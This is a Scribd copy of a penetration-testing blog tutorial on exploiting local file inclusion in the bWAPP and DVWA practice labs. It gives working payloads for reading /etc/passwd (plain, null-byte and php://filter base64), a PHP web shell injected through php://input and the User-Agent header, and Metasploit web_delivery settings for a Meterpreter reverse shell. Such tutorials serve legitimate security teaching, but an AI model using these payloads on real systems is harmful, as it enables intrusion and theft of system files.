Scribd Logo
Upload

Welcome to Scribd!

  • 13 views

    5 Ways To Exploit LFi

    Uploaded by

    nadjeh elhamza
    The document discusses 5 ways to exploit local file inclusion (LFI) vulnerabilities: 1) Basic LFI to read files like /etc/passwd 2) Using a null byte injection to bypass security restrictions 3) Base64 encoding the file contents to display encoded text 4) Using PHP input functions to execute injected PHP code 5) Setting up a reverse connection through Metasploit to gain remote access

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    5 Ways To Exploit LFi

    Uploaded by

    nadjeh elhamza
    13 views20 pages
    The document discusses 5 ways to exploit local file inclusion (LFI) vulnerabilities: 1) Basic LFI to read files like /etc/passwd 2) Using a null byte injection to bypass security restrictions 3) Base64 encoding the file contents to display encoded text 4) Using PHP input functions to execute injected PHP code 5) Setting up a reverse connection through Metasploit to gain remote access

    Original Description:

    Vulnerability

    Original Title

    5 ways to Exploit LFi

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document discusses 5 ways to exploit local file inclusion (LFI) vulnerabilities: 1) Basic LFI to read files like /etc/passwd 2) Using a null byte injection to bypass security restrictions 3) Base64 encoding the file contents to display encoded text 4) Using PHP input functions to execute injected PHP code 5) Setting up a reverse connection through Metasploit to gain remote access

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    13 views20 pages

    5 Ways To Exploit LFi

    Uploaded by

    nadjeh elhamza
    The document discusses 5 ways to exploit local file inclusion (LFI) vulnerabilities: 1) Basic LFI to read files like /etc/passwd 2) Using a null byte injection to bypass security restrictions 3) Base64 encoding the file contents to display encoded text 4) Using PHP input functions to execute injected PHP code 5) Setting up a reverse connection through Metasploit to gain remote access

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    of 20

    Hacking Articles

    Raj Chandel's Blog

    Author Web Penetration Testing Penetration Testing Courses We Offer My Books Donate us

    5 ways to Exploit LFi Vulnerability Search


    posted in KALI LINUX , PENETRATION TESTING , WEBSITE HACKING on FEBRUARY 15, 2017 ENTER KEYWORD

    by RAJ CHANDEL  SHARE

    Subscribe to Blog via


    The main aim of writing this article is to share the idea of making an attack on a web server
    Email
    using various techniques when the server is suffering from le inclusion vulnerability. As
    we all are aware of LFI vulnerability which allows the user to include a le through URL in Email Address
    the browser. In this article I have used two different platform bWAPP and DVWA which
    contains le inclusion vulnerability and through which I have performed LFI attack in SUBSCRIBE
    FOUR different ways.

    Basic local file inclusion

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug
    remote & local le Inclusion then click on hack.
        

    Here the requested web page which suffering from RFI & LFI Vulnerability gets open.
    Where you will nd a comment to select a language from the given drop down list, and
    when you click on go button the selected language le get included in URL. To perform
    basic attacks manipulate

    http://192.168.1.101/bWAPP/rl .php?language=lang_en.php&action=go into


    192.168.1.101/bWAPP/ .php?language=/etc/passwd

    In basic LFI attack we can directly read the content of a le from its directories using (../) or
    simply (/), now if you will notice the given below screenshot you will nd that I have access

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    the password le when the above URL is executed in the browser. Categories
     BackTrack 5 Tutorials

     Best of Hacking
     Browser Hacking

     Cryptography & Stegnography


     CTF Challenges

     Cyber Forensics

     Database Hacking
     Domain Hacking

     Email Hacking

     Footprinting
     Hacking Tools

     Kali Linux

     Nmap
     Others

     Penetration Testing

     Social Engineering Toolkit

     Trojans & Backdoors

     Website Hacking

     Window Password Hacking


    Null byte
     Windows Hacking Tricks
    In some scenario the above basic local le inclusion attack may not work due to high
     Wireless Hacking
    security level. From below image you can observe now that I got fail to read the password
     Youtube Hacking

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    le when executing the same path in URL. So when we face such kind of problem then go
    for NULL BYTE attack. Articles
    Now turn on burp suite to capture the browser request then select proxy tab and start
    Select Month 
    intercept. Do not forget to set browser proxy while making use of burp suite

    Facebook Page
    Ignite Technolo…
    5.2K likes

    Like Page

    Be the first of your friends to like this

    Now inside burp suite send the intercepted data into repeater.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Inside repeater you can do analysis of sent request and response generated by it. From
    screenshot it will be clear that /etc/passwd is not working and I am not able to read the
    password le.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    From following screenshot you can see I had forward the request by adding null character
    (%00) at the end of directory /etc/passwd%00 and click on go tab. Then on the right sight
    of window the password le get open as response.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Base64 encoded
    Now there is another way to exploit LFI when the security level is high and you are unable
    to view the PHP le content, and then use the following PHP function.

    http://192.168.1.101/bWAPP/rl .php?language= php:// lter/read=convert.base64-


    encode/resource=/etc/passwd

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Here from the screenshot you can see the content of password le is encoded into base64;
    copy the whole encoded text.

    I am using hackbar which a Firefox plugin to decode above copied text.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Now a pop-up box will get open past the copied encoded text inside it and click on ok

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    From the given screenshot you can view the result and read the content of password le.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    PHP Input
    Using PHP input function we will execute injected PHP code to exploit LFI vulnerability.
    With the help of hackbar I am going to perform this task in which rst we need to load the
    URL of the targeted web page as you can see in the given screenshot.

    http://192.168.1.101/bWAPP/rl .php?language=lang_en.php&action=go

    Now manipulate above URL using PHP input function

    http://192.168.1.101/bWAPP/rl .php?language=php://input&cmd=ls

    Then select the check box to enable Post data which will forward the post request and add
    cmd comment in given text area<?php system($_GET[‘cmd’]); ?>as shown in following
    screenshot, nally click on execute.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    This will show directories of victim PC.

    Now time to connect the victim through reverse connection; open terminal in kali Linux
    and type msfconsole to start metasploit framework.

    Now type use exploit/multi/script/web_delivery

    msf exploit (web_delivery)>set target 1

    msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

    msf exploit (web_delivery)> set lhost 192.168.0.104

    msf exploit (web_delivery)>set srvport 8081

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    msf exploit (web_delivery)>exploit

    Copy the highlighted text shown in below window

    Paste above copied PHP code inside the URL as shown in the image and execute it.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    When above URL get execute the attacker got victim’s meterpreter session inside the
    metasploit.

    msf exploit (web_delivery)>session –I 1

    meterpreter> sysinfo

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Proc/self/environ
    If the server is outdated then to exploit it through LFI we can include proc/self/environ le
    that stores User_Agent where we will place our PHP code for executing CMD command.

    http://192.168.1.102/dvwa/vulnerabilities/ /?page=proc/self/environ

    Now start burp suite and capture the browser request and send the fetch data into
    repeater.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Add cmd comment <?php system($_GET[‘cmd’]); ?> inside user_Agent and send the
    request with GET parameter 192.168.1.8/l /l .php?
    le=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right
    side of window you can see the highlight result as response.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an
    Information Security Consultant Social Media Lover and Gadgets. Contact here

    Share this:

      
    Like this:

    Loading...

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    ABOUT THE AUTHOR

    RAJ CHANDEL
    Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking
    Industry. At present other than his name he can also be called as An Ethical Hacker,
    A Cyber Security Expert, A Penetration Tester. With years of quality Experience in
    IT and software industry

    PREVIOUS POST NEXT POST


    ← APACHE LOG POISONING FILE UPLOAD EXPLOITATION IN
    THROUGH LFI BWAPP (BYPASS ALL SECURITY) →

    2 Comments → 5 WAYS TO EXPLOIT LFI VULNERABILITY

    ANKUR January 15, 2018 at 7:02 am

    Hi Raj, I tried to do null byte on DVWA but its not working. I added %00
    after etc/passwd but its not working and i get response as le not found.
    Any suggestions please.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    REPLY ↓

    RAJ CHANDEL January 20, 2018 at 12:06 pm

    It depends upon version to version. when we working on


    DVWA our DVWA version is different than yours.
    REPLY ↓

    Leave a Reply
    Your email address will not be published. Required elds are marked *

    Comment

    Name *

    Email *

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
    Website


    Save my name, email, and website in this browser for the next time I comment.

    POST COMMENT

     Notify me of follow-up comments by email.

     Notify me of new posts by email.

    Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

    You might also like